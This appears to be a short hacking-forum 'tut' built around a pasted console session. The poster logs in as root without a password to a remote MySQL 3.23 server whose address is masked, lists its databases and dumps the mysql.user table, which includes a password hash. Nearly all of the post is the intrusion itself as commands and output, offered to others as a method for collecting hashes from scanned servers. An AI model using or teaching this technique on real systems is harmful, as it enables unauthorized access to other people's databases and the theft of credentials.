the dude that wanted to get the hashes ....
C:\mysqlscan\tools>mysql.exe -h ***.***.** -uroot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 14 to server version: 3.23.47-nt
Type 'help' for help.
mysql> show databases;
+-----------+
| Database |
+-----------+
| andypics |
| gerlicher |
| infuse |
| mysql |
| robble |
| roster |
| test |
+-----------+
7 rows in set (0.31 sec)
mysql> use mysql;
Reading table information for completion of table and column names
Database changed
mysql> show tables;
+-----------------+
| Tables_in_mysql |
+-----------------+
| columns_priv |
| db |
| func |
| host |
| tables_priv |
| user |
+-----------------+
6 rows in set (0.30 sec)
mysql> select * from user;
+-----------+-------+------------------+-------------+-------------+------------
-+-------------+-------------+-----------+-------------+---------------+--------
------+-----------+------------+-----------------+------------+------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv
| Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process
_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv |
+-----------+-------+------------------+-------------+-------------+------------
-+-------------+-------------+-----------+-------------+---------------+--------
------+-----------+------------+-----------------+------------+------------+
| localhost | root | | Y | Y | Y
| Y | Y | Y | Y | Y | Y
| Y | Y | Y | Y | Y |
| % | root | | Y | Y | Y
| Y | Y | Y | Y | Y | Y
| Y | Y | Y | Y | Y |
| localhost | | | Y | Y | Y
| Y | Y | Y | Y | Y | Y
| Y | Y | Y | Y | Y |
| % | | | N | N | N
| N | N | N | N | N | N
| N | N | N | N | N |
| localhost | mysql | 3c21873862fdc801 | Y | Y | Y
| Y | Y | Y | Y | Y | Y
| Y | Y | Y | Y | Y |
+-----------+-------+------------------+-------------+-------------+------------
-+-------------+-------------+-----------+-------------+---------------+--------
------+-----------+------------+-----------------+------------+------------+
5 rows in set (0.38 sec)
mysql> quit
Bye
Made this tut by myself

gotta do a full 1 sometime, cbf scaning tho